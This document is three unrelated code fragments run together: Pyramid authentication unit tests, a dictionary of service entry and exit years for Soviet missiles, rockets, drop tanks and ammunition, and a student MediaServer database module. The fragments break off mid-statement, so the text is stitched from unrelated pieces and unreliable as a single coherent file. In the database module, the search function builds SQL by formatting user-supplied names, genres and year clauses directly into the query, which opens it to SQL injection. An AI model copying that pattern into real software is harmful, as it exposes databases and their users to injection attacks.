result = policy.remember(request, 'fred', max_age=23)
self.assertEqual(result[1], {'repoze.who.userid':'fred', 'max_age': 23})
def test_forget_no_plugins(self):
request = DummyRequest({})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result, [])
def test_forget(self):
authtkt = DummyWhoPlugin()
request = DummyRequest(
{'repoze.who.plugins':{'auth_tkt':authtkt},
'repoze.who.identity':{'repoze.who.userid':'fred'},
})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result[0], request.environ)
self.assertEqual(result[1], request.environ['repoze.who.identity'])
class TestRemoteUserAuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import RemoteUserAuthenticationPolicy
return RemoteUserAuthenticationPolicy
def _makeOne(self, environ_key='REMOTE_USER', callback=None):
return self._getTargetClass()(environ_key, callback)
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne())
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_None(self):
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_effective_principals_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred'])
def test_remember(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_forget(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne()
result = policy.forget(request)
self.assertEqual(result, [])
class TestAuthTktAuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import AuthTktAuthenticationPolicy
return AuthTktAuthenticationPolicy
def _makeOne(self, callback, cookieidentity, **kw):
inst = self._getTargetClass()('secret', callback, **kw)
inst.cookie = DummyCookieHelper(cookieidentity)
return inst
def setUp(self):
self.warnings = warnings.catch_warnings()
self.warnings.__enter__()
warnings.simplefilter('ignore', DeprecationWarning)
def tearDown(self):
self.warnings.__exit__(None, None, None)
def test_allargs(self):
# pass all known args
inst = self._getTargetClass()(
'secret', callback=None, cookie_name=None, secure=False,
include_ip=False, timeout=None, reissue_time=None,
hashalg='sha512',
)
self.assertEqual(inst.callback, None)
def test_hashalg_override(self):
# important to ensure hashalg is passed to cookie helper
inst = self._getTargetClass()('secret', hashalg='sha512')
self.assertEqual(inst.cookie.hashalg, 'sha512')
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.unauthenticated_userid(request), None)
def test_unauthenticated_userid(self):
request = DummyRequest({'REMOTE_USER':'fred'})
policy = self._makeOne(None, {'userid':'fred'})
self.assertEqual(policy.unauthenticated_userid(request), 'fred')
def test_authenticated_userid_no_cookie_identity(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid_callback_returns_None(self):
request = DummyRequest({})
def callback(userid, request):
return None
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.authenticated_userid(request), None)
def test_authenticated_userid(self):
request = DummyRequest({})
def callback(userid, request):
return True
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.authenticated_userid(request), 'fred')
def test_effective_principals_no_cookie_identity(self):
from pyramid.security import Everyone
request = DummyRequest({})
policy = self._makeOne(None, None)
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals_callback_returns_None(self):
from pyramid.security import Everyone
request = DummyRequest({})
def callback(userid, request):
return None
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.effective_principals(request), [Everyone])
def test_effective_principals(self):
from pyramid.security import Everyone
from pyramid.security import Authenticated
request = DummyRequest({})
def callback(userid, request):
return ['group.foo']
policy = self._makeOne(callback, {'userid':'fred'})
self.assertEqual(policy.effective_principals(request),
[Everyone, Authenticated, 'fred', 'group.foo'])
def test_remember(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.remember(request, 'fred')
self.assertEqual(result, [])
def test_remember_with_extra_kargs(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.remember(request, 'fred', a=1, b=2)
self.assertEqual(policy.cookie.kw, {'a':1, 'b':2})
self.assertEqual(result, [])
def test_forget(self):
request = DummyRequest({})
policy = self._makeOne(None, None)
result = policy.forget(request)
self.assertEqual(result, [])
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne(None, None))
class TestAuthTktCookieHelper(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import AuthTktCookieHelper
return AuthTktCookieHelper
def _makeOne(self, *arg, **kw):
helper = self._getTargetClass()(*arg, **kw)
# laziness after moving auth_tkt classes and funcs into
# authentication module
auth_tkt = DummyAuthTktModule()
helper.auth_tkt = auth_tkt
helper.AuthTicket = auth_tkt.AuthTicket
helper.parse_ticket = auth_tkt.parse_ticket
helper.BadTicket = auth_tkt.BadTicket
return helper
def _makeRequest(self, cookie=None, ipv6=False):
environ = {'wsgi.version': (1,0)}
if | |
'Exit':1990},
'R-60': {'Entry':1973, 'Exit':1992},
'R-60M': {'Entry':1983, 'Exit':2999},
'R-60MK': {'Entry':1983, 'Exit':2999},
'R-73': {'Entry':1972, 'Exit':2007},
'R-73E': {'Entry':1984, 'Exit':2999},
'R-73M': {'Entry':1997, 'Exit':2999},
'R-73M2': {'Entry':2011, 'Exit':2999},
'R-77': {'Entry':1991, 'Exit':2999},
'R-77PL': {'Entry':2007, 'Exit':2999},
'R-77T': {'Entry':1991, 'Exit':2999},
'3M9M': {'Entry':1967, 'Exit':1975},
'3M9M1': {'Entry':1973, 'Exit':1982},
'3M9M3': {'Entry':1976, 'Exit':1984},
'3M9M4': {'Entry':1978, 'Exit':1988},
'40N6': {'Entry':2012, 'Exit':2999},
'40N6D': {'Entry':2012, 'Exit':2999},
'48N6': {'Entry':1993, 'Exit':2999},
'48N6D': {'Entry':2010, 'Exit':2999},
'48N6DM': {'Entry':2018, 'Exit':2999},
'48N6E': {'Entry':1993, 'Exit':2999},
'48N6E2': {'Entry':2010, 'Exit':2999},
'48N6E3': {'Entry':2018, 'Exit':2999},
'5V55K': {'Entry':1978, 'Exit':2008},
'5V55KD': {'Entry':1990, 'Exit':2006},
'5V55PM': {'Entry':1990, 'Exit':2999},
'5V55R': {'Entry':1982, 'Exit':1994},
'5V55RD': {'Entry':1990, 'Exit':2006},
'5V55RM': {'Entry':1981, 'Exit':2999},
'5V55RUD': {'Entry':1990, 'Exit':2999},
'5V55S': {'Entry':1982, 'Exit':1994},
'5V55U': {'Entry':1990, 'Exit':2007},
'5V55V': {'Entry':1993, 'Exit':2007},
'9K32 Strela 2': {'Entry':1968, 'Exit':2999},
'9M32 Strela 2': {'Entry':1969, 'Exit':2999},
'9M32M Strela 3': {'Entry':1974, 'Exit':2999},
'9M311 Kashtan': {'Entry':1989, 'Exit':2999},
'9M317': {'Entry':1998, 'Exit':2999},
'9M33': {'Entry':1971, 'Exit':1977},
'9M330 Kinzhal': {'Entry':1986, 'Exit':2999},
'9M33M': {'Entry':1972, 'Exit':1980},
'9M33M2': {'Entry':1975, 'Exit':1988},
'9M33M3': {'Entry':1980, 'Exit':1991},
'9M38': {'Entry':1980, 'Exit':1991},
'9M38M1': {'Entry':1983, 'Exit':1991},
'9M38M2': {'Entry':1998, 'Exit':2999},
'9M39M1': {'Entry':1998, 'Exit':2999},
'9M82': {'Entry':1986, 'Exit':1996},
'9M82M': {'Entry':1992, 'Exit':2999},
'9M83': {'Entry':1988, 'Exit':1997},
'9M83M': {'Entry':1998, 'Exit':2999},
'9M8M': {'Entry':1965, 'Exit':1980},
'9M8M1': {'Entry':1967, 'Exit':1984},
'9M8M2': {'Entry':1971, 'Exit':1990},
'9M8M3': {'Entry':1974, 'Exit':1993},
'9M96': {'Entry':2007, 'Exit':2999},
'9M96D': {'Entry':2007, 'Exit':2999},
'9M96E': {'Entry':2007, 'Exit':2999},
'9M96E2': {'Entry':2007, 'Exit':2999},
'Igla-M': {'Entry':1983, 'Exit':2999},
'V-300': {'Entry':1952, 'Exit':1993},
'V-600': {'Entry':1961, 'Exit':1970},
'V-601': {'Entry':1963, 'Exit':2999},
'V-611': {'Entry':1967, 'Exit':2999},
'V-611M': {'Entry':1972, 'Exit':2999},
'V-750': {'Entry':1957, 'Exit':1976},
'V-750V': {'Entry':1958, 'Exit':1980},
'V-750VN': {'Entry':1958, 'Exit':1980},
'V-755': {'Entry':1959, 'Exit':1991},
'V-759': {'Entry':1968, 'Exit':1996},
'V-760': {'Entry':1975, 'Exit':1996},
'V-860': {'Entry':1967, 'Exit':1980},
'V-860P': {'Entry':1967, 'Exit':1980},
'V-860PV': {'Entry':1970, 'Exit':1983},
'V-870': {'Entry':1975, 'Exit':1991},
'V-880': {'Entry':1976, 'Exit':1991},
'V-880E': {'Entry':1970, 'Exit':1983},
'V-880M': {'Entry':1976, 'Exit':1991},
'V-880MN': {'Entry':1976, 'Exit':1991},
'V-880N': {'Entry':1976, 'Exit':1991},
'RPK-3 Metel': {'Entry':1969, 'Exit':2999},
'RPK-6 Vodopod': {'Entry':1981, 'Exit':2999},
'RPK-7 Veter': {'Entry':1984, 'Exit':2999},
'50mm (2in) FFAR Rockets': {'Entry':1948, 'Exit':2999},
'5in FFAR': {'Entry':1943, 'Exit':1946},
'5in HVAR': {'Entry':1944, 'Exit':1955},
'RP-3 AP': {'Entry':1943, 'Exit':1947},
'RP-3 HE': {'Entry':1943, 'Exit':1947},
'S-24B 240mm': {'Entry':1973, 'Exit':2999},
'S-25C 266mm': {'Entry':1971, 'Exit':2999},
'S-25OF 266mm': {'Entry':1971, 'Exit':2999},
'S-3K 160mm': {'Entry':1944, 'Exit':1955},
'S-5K 57mm': {'Entry':1955, 'Exit':2999},
'S-5K Rocket': {'Entry':1955, 'Exit':2999},
'S-5M Rocket': {'Entry':1955, 'Exit':2999},
'S-8B 80mm': {'Entry':1955, 'Exit':2999},
'S-8K 80mm': {'Entry':1955, 'Exit':2999},
'Kh-15': {'Entry':1980, 'Exit':2999},
'Kh-22N': {'Entry':1971, 'Exit':2999},
'Kh-58U': {'Entry':1988, 'Exit':2020},
'RDS 220 Tsar Bomba 50MT': {'Entry':1961, 'Exit':1961},
'RN-25': {'Entry':1960, 'Exit':1991},
'RN-28': {'Entry':1974, 'Exit':1991},
'TN-1000': {'Entry':1960, 'Exit':2999},
'APR-2E': {'Entry':1962, 'Exit':2999},
'AT-1': {'Entry':1962, 'Exit':2999},
'AT-2M': {'Entry':1975, 'Exit':2999},
'VTT-1': {'Entry':1900, 'Exit':2999},
"310 liter tank": {'Entry':1900, 'Exit':2999},
"100 gallon wing tank": {'Entry':1900, 'Exit':2999},
"400 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-400": {'Entry':1900, 'Exit':2999},
"120 gallon tank": {'Entry':1900, 'Exit':2999},
"150 gallon tank": {'Entry':1900, 'Exit':2999},
"300 gallon tank": {'Entry':1900, 'Exit':2999},
"450 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-490": {'Entry':1900, 'Exit':2999},
"500 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-600": {'Entry':1900, 'Exit':2999},
"600 liter tank": {'Entry':1900, 'Exit':2999},
"Tanque de 600 litros": {'Entry':1900, 'Exit':2999},
"625 liter tank": {'Entry':1900, 'Exit':2999},
"700 liter tank": {'Entry':1900, 'Exit':2999},
"190 gallon wing tank": {'Entry':1900, 'Exit':2999},
"750 litre tank": {'Entry':1900, 'Exit':2999},
"750 liter tank": {'Entry':1900, 'Exit':2999},
"782 liter tank": {'Entry':1900, 'Exit':2999},
"800 liter tank": {'Entry':1900, 'Exit':2999},
"PTB-800": {'Entry':1900, 'Exit':2999},
"900 liter tank": {'Entry':1900, 'Exit':2999},
"1000 liter tank": {'Entry':1900, 'Exit':2999},
"FPU-1": {'Entry':1900, 'Exit':2999},
"285 Gallon Internal Tank FB-111": {'Entry':1900, 'Exit':2999},
"1100 Liter Tank": {'Entry':1900, 'Exit':2999},
"300 Gallon Internal Tank FB-111": {'Entry':1900, 'Exit':2999},
"300 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 300 galones": {'Entry':1900, 'Exit':2999},
"1150 Liter Tank": {'Entry':1900, 'Exit':2999},
"PTB 1150": {'Entry':1900, 'Exit':2999},
"FPU-6": {'Entry':1900, 'Exit':2999},
"1200 liter tank": {'Entry':1900, 'Exit':2999},
"330 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 330 galones": {'Entry':1900, 'Exit':2999},
"1250 liter tank": {'Entry':1900, 'Exit':2999},
"FPU-8": {'Entry':1900, 'Exit':2999},
"370 gallon wing tank": {'Entry':1900, 'Exit':2999},
"Tanque de 370 galones": {'Entry':1900, 'Exit':2999},
"1400 liter tank": {'Entry':1900, 'Exit':2999},
"1520 Liter Tank": {'Entry':1900, 'Exit':2999},
"1700 liter tank": {'Entry':1900, 'Exit':2999},
"2000 liter tank": {'Entry':1900, 'Exit':2999},
"Lightning Ventral Tank": {'Entry':1900, 'Exit':2999},
"594 gallon wing tank": {'Entry':1900, 'Exit':2999},
"600 gallon centerline tank": {'Entry':1900, 'Exit':2999},
"Tanque de 600 galones": {'Entry':1900, 'Exit':2999},
"600 gallon tank": {'Entry':1900, 'Exit':2999},
"FPU-7": {'Entry':1900, 'Exit':2999},
"3000 liter tank": {'Entry':1900, 'Exit':2999},
"AJ500 Fuel": {'Entry':1900, 'Exit':2999},
"AJ840 Fuel": {'Entry':1900, 'Exit':2999},
"AJ1340 Fuel": {'Entry':1900, 'Exit':2999},
".30 cal bullet": {'Entry':1900, 'Exit':2999},
".50 cal bullet air": {'Entry':1900, 'Exit':2999},
".50 cal bullet": {'Entry':1900, 'Exit':2999},
"100mm 3BM6 HVAPDS": {'Entry':1900, 'Exit':2999},
"100mm AA": {'Entry':1900, 'Exit':2999},
"100mm F-55 HE": {'Entry':1900, 'Exit':2999},
"100mm FRAG": {'Entry':1900, 'Exit':2999},
"100mm OEA F1 HE": {'Entry':1900, 'Exit':2999},
"100mm OEA Mle 1928": {'Entry':1900, 'Exit':2999},
"100mm OF-55 FRAG": {'Entry':1900, 'Exit':2999},
"100mm OF-58 FRAG": {'Entry':1900, 'Exit':2999},
"100mm OPF F4 PFHE": {'Entry':1900, 'Exit':2999},
"100mm ZS-55P AA": {'Entry':1900, 'Exit':2999},
"100mm ZS-58 AA": {'Entry':1900, 'Exit':2999},
"100mm ZS-58P AA": {'Entry':1900, 'Exit':2999},
"105mm APFSDS": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE(AA fuse)": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE-ER": {'Entry':1900, 'Exit':2999},
"114mm N4A1 HE-ER(AA fuse)": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 AA": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 HE": {'Entry':1900, 'Exit':2999},
"114mm/53 mk6 SAP": {'Entry':1900, 'Exit':2999},
"115mm 3VBM-1 APFSDS": {'Entry':1900, 'Exit':2999},
"12.7mm B-30 AP": {'Entry':1900, 'Exit':2999},
"12.7mm B-32 APi": {'Entry':1900, 'Exit':2999},
"12.7mm YaKB Burst": {'Entry':1900, 'Exit':2999},
"12.7x108mm": {'Entry':1900, 'Exit':2999},
"120mm M829A2 APFSDS": {'Entry':1900, 'Exit':2999},
"125mm 3VBM19 APFSDS": {'Entry':1900, 'Exit':2999},
"127mm mk 127 HE-CVT EX-175": {'Entry':1900, 'Exit':2999},
"127mm mk 127 HE-CVT mk 67": {'Entry':1900, 'Exit':2999},
"127mm mk 32": {'Entry':1900, 'Exit':2999},
"127mm mk 34 AAC": {'Entry':1900, 'Exit':2999},
"127mm mk 41 AAC": {'Entry':1900, 'Exit':2999},
"127mm mk 41 HC": {'Entry':1900, 'Exit':2999},
"127mm mk 80 HE-PD EX-175": {'Entry':1900, 'Exit':2999},
"127mm mk 80 HE-PD mk 67": {'Entry':1900, 'Exit':2999},
"12cm/50 Mdl50 HE": {'Entry':1900, 'Exit':2999},
"130mm AK-130": {'Entry':1900, 'Exit':2999},
"130mm F-44 HE": {'Entry':1900, 'Exit':2999},
"130mm OF-42 HE-FRAG": {'Entry':1900, 'Exit':2999},
"130mm PB-42 SAP": {'Entry':1900, 'Exit':2999},
"130mm ZS-42P AA": {'Entry':1900, 'Exit':2999},
"130mm ZS-44 AA": {'Entry':1900, 'Exit':2999},
"130mm ZS-44P AA": {'Entry':1900, 'Exit':2999},
"152mm AP B-35": {'Entry':1900, 'Exit':2999},
"152mm HE OF-35": {'Entry':1900, 'Exit':2999},
"152mm SAP PB-35": {'Entry':1900, 'Exit':2999},
"20mm APT percussion": {'Entry':1900, 'Exit':2999},
"20mm F2": {'Entry':1900, 'Exit':2999},
"20mm HE-T x10": {'Entry':1900, 'Exit':2999},
"20mm HE-T x2": {'Entry':1900, 'Exit':2999},
"20mm HE-T": {'Entry':1900, 'Exit':2999},
"20mm HEI Electric": {'Entry':1900, 'Exit':2999},
"20mm HEI Percussion": {'Entry':1900, 'Exit':2999},
"20mm HS.404 x2": {'Entry':1900, 'Exit':2999},
"20mm HS.404": {'Entry':1900, 'Exit':2999},
"20mm M53 API": {'Entry':1900, 'Exit':2999},
"20mm Mark 149-4": {'Entry':1900, 'Exit':2999},
"20mm Meroka APDS-T": {'Entry':1900, 'Exit':2999},
"20mm Mk-15": {'Entry':1900, 'Exit':2999},
"20mm PGU": {'Entry':1900, 'Exit':2999},
"20mm PGU-28/B": {'Entry':1900, 'Exit':2999},
"20mm Rh202 HE-T": {'Entry':1900, 'Exit':2999},
"20mm SAP(b)": {'Entry':1900, 'Exit':2999},
"20mm mark 244-0 ELC": {'Entry':1900, 'Exit':2999},
"20mm/85 GAM-B01 HE-I": {'Entry':1900, 'Exit':2999},
"20x102 mm burst": {'Entry':1900, 'Exit':2999},
"20x110 mm x2": {'Entry':1900, 'Exit':2999},
"20x110 mm": {'Entry':1900, 'Exit':2999},
"23mm AM-23": {'Entry':1900, 'Exit':2999},
"23mm AM/NR-23 HEI x2": {'Entry':1900, 'Exit':2999},
"23mm AM/NR-23 HEI": {'Entry':1900, 'Exit':2999},
"23mm GSh-23 HEI": {'Entry':1900, 'Exit':2999},
"23mm OFZ": {'Entry':1900, 'Exit':2999},
"25mm APDS": {'Entry':1900, 'Exit':2999},
"25mm APDS-T": {'Entry':1900, 'Exit':2999},
"25mm FAPDS-T": {'Entry':1900, 'Exit':2999},
"25mm HE-I-T": {'Entry':1900, 'Exit':2999},
"25mm HEI": {'Entry':1900, 'Exit':2999},
"25mm HEI-T": {'Entry':1900, 'Exit':2999},
"25mm M791 APDS-T": {'Entry':1900, 'Exit':2999},
"25mm SAPHEI": {'Entry':1900, 'Exit':2999},
"25mm SAPHEI-T": {'Entry':1900, 'Exit':2999},
"27mm DM10 FAPDS": {'Entry':1900, 'Exit':2999},
"27mm FAPDS": {'Entry':1900, 'Exit':2999},
"27mm HE": {'Entry':1900, 'Exit':2999},
"30mm 3UBR8 APDS": {'Entry':1900, 'Exit':2999},
"30mm ADEN API": {'Entry':1900, 'Exit':2999},
"30mm AK-630": {'Entry':1900, 'Exit':2999},
"30mm AP-I": {'Entry':1900, 'Exit':2999},
"30mm APDS": {'Entry':1900, 'Exit':2999},
"30mm APDS-T": {'Entry':1900, 'Exit':2999},
"30mm APFSDS-T": {'Entry':1900, 'Exit':2999},
"30mm API": {'Entry':1900, 'Exit':2999},
"30mm Br-83 AP": {'Entry':1900, 'Exit':2999},
"30mm DEFA": {'Entry':1900, 'Exit':2999},
"30mm F-33 HE": {'Entry':1900, 'Exit':2999},
"30mm FMPDS": {'Entry':1900, 'Exit':2999},
"30mm HE": {'Entry':1900, 'Exit':2999},
"30mm HEI": {'Entry':1900, 'Exit':2999},
"30mm HEI-T": {'Entry':1900, 'Exit':2999},
"30mm M230 Chaingun Ammo": {'Entry':1900, 'Exit':2999},
"30mm NR-30 HEI x2": {'Entry':1900, 'Exit':2999},
"30mm NR-30 HEI": {'Entry':1900, 'Exit':2999},
"30mm OF-83 HE-FRAG": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG AK-306": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG AK-630M": {'Entry':1900, 'Exit':2999},
"30mm OF-84 HE-FRAG Kashtan-M": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer AK-306": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer AK-630M": {'Entry':1900, 'Exit':2999},
"30mm OP-84 FRAG Tracer Kashtan-M": {'Entry':1900, 'Exit':2999},
"30mm PGU-13/B HE-I": {'Entry':1900, 'Exit':2999},
"30mm PGU-14/B API": {'Entry':1900, 'Exit':2999},
"30mm SAPHEI-T": {'Entry':1900, 'Exit':2999},
"30mm Su-25": {'Entry':1900, 'Exit':2999},
"30mm Type 730": {'Entry':1900, 'Exit':2999},
"30mm/75 GCM-AO3-2 APDS": {'Entry':1900, 'Exit':2999},
"30mm/75 GCM-AO3-2 HE": {'Entry':1900, 'Exit':2999},
"30x150mm GIAT": {'Entry':1900, 'Exit':2999},
"35mm AHEAD": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG Tracer x2": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG Tracer": {'Entry':1900, 'Exit':2999},
"37mm HE-FRAG": {'Entry':1900, 'Exit':2999},
"37mm Type 676 HE-FRAG": {'Entry':1900, 'Exit':2999},
"40 mm L70 HE x5": {'Entry':1900, 'Exit':2999},
"406mm Mk13 HC": {'Entry':1900, 'Exit':2999},
"406mm Mk8 AP": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x2": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x4": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1 x8": {'Entry':1900, 'Exit':2999},
"40mm HE Mk1 Md1": {'Entry':1900, 'Exit':2999},
| |
#!/usr/bin/env python3
"""
MediaServer Database module.
Contains all interactions between the webapp and the queries to the database.
"""
import configparser
import json
import sys
from modules import pg8000
################################################################################
# Welcome to the database file, where all the query magic happens.
# My biggest tip is look at the *week 8 lab*.
# Important information:
# - If you're getting issues and getting locked out of your database.
# You may have reached the maximum number of connections.
# Why? (You're not closing things!) Be careful!
# - Check things *carefully*.
# - There may be better ways to do things, this is just for example
# purposes
# - ORDERING MATTERS
# - Unfortunately to make it easier for everyone, we have to ask that
# your columns are in order. WATCH YOUR SELECTS!! :)
# Good luck!
# And remember to have some fun :D
################################################################################
#############################
# #
# Database Helper Functions #
# #
#############################
#####################################################
# Database Connect
# (No need to touch
# (unless the exception is potatoing))
#####################################################
def database_connect():
"""
Connects to the database using the connection string.
If 'None' was returned it means there was an issue connecting to
the database. It would be wise to handle this ;)
"""
# Read the config file
config = configparser.ConfigParser()
config.read('config.ini')
if 'database' not in config['DATABASE']:
config['DATABASE']['database'] = config['DATABASE']['user']
# Create a connection to the database
connection = None
try:
# Parses the config file and connects using the connect string
connection = pg8000.connect(database=config['DATABASE']['database'],
user=config['DATABASE']['user'],
password=config['DATABASE']['password'],
host=config['DATABASE']['host'])
except pg8000.OperationalError as operation_error:
print("""Error, you haven't updated your config.ini or you have a bad
connection, please try again. (Update your files first, then check
internet connection)
""")
print(operation_error)
return None
# return the connection to use
return connection
##################################################
# Print a SQL string to see how it would insert #
##################################################
def print_sql_string(inputstring, params=None):
"""
Prints out a string as a SQL string parameterized assuming all strings
"""
if params is not None:
if params != []:
inputstring = inputstring.replace("%s","'%s'")
print(inputstring % params)
#####################################################
# SQL Dictionary Fetch
# useful for pulling particular items as a dict
# (No need to touch
# (unless the exception is potatoing))
# Expected return:
# singlerow: [{col1name:col1value,col2name:col2value, etc.}]
# multiplerow: [{col1name:col1value,col2name:col2value, etc.},
# {col1name:col1value,col2name:col2value, etc.},
# etc.]
#####################################################
def dictfetchall(cursor,sqltext,params=None):
""" Returns query results as list of dictionaries."""
result = []
if (params is None):
print(sqltext)
else:
print("we HAVE PARAMS!")
print_sql_string(sqltext,params)
cursor.execute(sqltext,params)
cols = [a[0].decode("utf-8") for a in cursor.description]
print(cols)
returnres = cursor.fetchall()
for row in returnres:
result.append({a:b for a,b in zip(cols, row)})
# cursor.close()
return result
def dictfetchone(cursor,sqltext,params=None):
""" Returns query results as list of dictionaries."""
# cursor = conn.cursor()
result = []
cursor.execute(sqltext,params)
cols = [a[0].decode("utf-8") for a in cursor.description]
returnres = cursor.fetchone()
result.append({a:b for a,b in zip(cols, returnres)})
return result
#####################################################
#####################################################
#####################################################
########### Additional Task - MEDIUM ###########
#####################################################
#####################################################
#####################################################
# Film Genre - Multi Term Search
#
#####################################################
def search_filmgenre_multi(inDict):
"""
Searches for matching film genre contents by given filters
Input Examples->
1. mediaType:movie,name:The Shawshank Redemption,genre:drama,year:>1993
2. mediaType:all,genre:drama,year:>2009
3. mediaType:tvshow,name:Friends
4. mediaType:movie,genre:drama,year :>1993
5. mediaType:tvshow, genre: drama
6. mediaType:movie ,genre :drama,year:BETWEEN 1993 AND 2009
7. mediaType:tvshowep
8. mediaType:tvshowep,epname:The One Where Monica Gets A Roommate
9. mediaType:tvshowep,showname:The Friends
10. mediaType:tvshowep,showname:Friends,episode:10
10. mediaType:tvshowep,showname:Friends,season:1,episode:10
11. mediaType:tvshowep,showname:Friends,season:2
"""
conn = database_connect()
if(conn is None):
return None
cur = conn.cursor()
try:
sql_template_movie = """SELECT M.movie_id as item_id, M.movie_title as item_title, 'Movie' as item_type
FROM mediaserver.movie M LEFT OUTER JOIN mediaserver.mediaitemmetadata mimd on (m.movie_id = mimd.media_id)
JOIN mediaserver.Metadata md on (mimd.md_id = md.md_id)
JOIN mediaserver.MetadataType mdt on (md.md_type_id = mdt.md_type_id)"""
sql_template_tvshow = """ SELECT T.tvshow_id as item_id, T.tvshow_title as item_title, 'TV Show' as item_type
FROM mediaserver.tvshow T left outer join mediaserver.TVEpisode TE on (T.tvshow_id = TE.tvshow_id)
JOIN mediaserver.TVShowMetaData TVMD on (TE.tvshow_id = TVMD.tvshow_id)
JOIN mediaserver.Metadata md on (TVMD.md_id = md.md_id)
JOIN mediaserver.MetadataType mdt on (md.md_type_id = mdt.md_type_id)"""
sql_template_tvshowep = """SELECT te.media_id as item_id, te.tvshow_episode_title as item_title, 'TV Show Episode' as item_type
FROM mediaserver.tvshow T left outer join mediaserver.TVEpisode te on (T.tvshow_id = te.tvshow_id)
left outer join
(mediaserver.mediaitemmetadata natural join mediaserver.metadata natural join mediaserver.MetaDataType) md
on (te.media_id=md.media_id)"""
sql_ending = """ group by item_id, item_title, item_type
order by item_id"""
where_clause = " WHERE md.md_type_id = 2 "
if inDict["mediaType"] == "movie":
if "name" in inDict:
where_clause = where_clause + "AND "+ "M.movie_title = '{}' ".format(inDict["name"])
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
if "year" in inDict:
where_clause = where_clause + "AND " + "M.release_year {} ".format(inDict["year"])
final_sql = sql_template_movie + where_clause + sql_ending
elif inDict["mediaType"] == "tvshow":
if "name" in inDict:
where_clause = where_clause + "AND "+ "T.tvshow_title = '{}' ".format(inDict["name"])
if "genre" in inDict:
where_clause = where_clause + "AND " + "md.md_value = '{}' ".format(inDict["genre"])
final_sql = sql_template_tvshow + where_clause + sql_ending
elif inDict["mediaType"] == "tvshowep":
where_clause = " WHERE md.md_type_id IN (2,3,4,5,6) "
if "epname" in inDict:
where_clause = where_clause + "AND " + "te.tvshow_episode_title = '{}' ".format(inDict["epname"])
if "season" in inDict and "showname" in inDict:
where_clause = where_clause + "AND " + "te.season = {} AND T.tvshow_title = '{}' ".format(inDict["season"],inDict["showname"])
if "episode" in inDict and "showname" in inDict:
where_clause = where_clause + "AND " + "te.episode = {} AND T.tvshow_title = '{}' ".format(inDict["episode"],inDict["showname"])
# if "date" in inDict:
# print("hi")
# if inputDict["date"][0] == '>' or inputDict['date'][0] == '<': #e.g., date:>2017-01-01
# where_clause = where_clause + " AND te.air_date {} '{}'".format(inputDict["date"][0], inputDict["date"][1:])
# elif inputDict["date"][0:2] == '>=' or inputDict['date'][0:2] == '<=': #e.g., publish_date:>=2017-01-01
# where_clause = where_clause + " AND te.air_date {} '{}'".format(inputDict["date"][0:2], inputDict["date"][2:])
# elif inputDict["date"].split()[0].lower() == 'between':
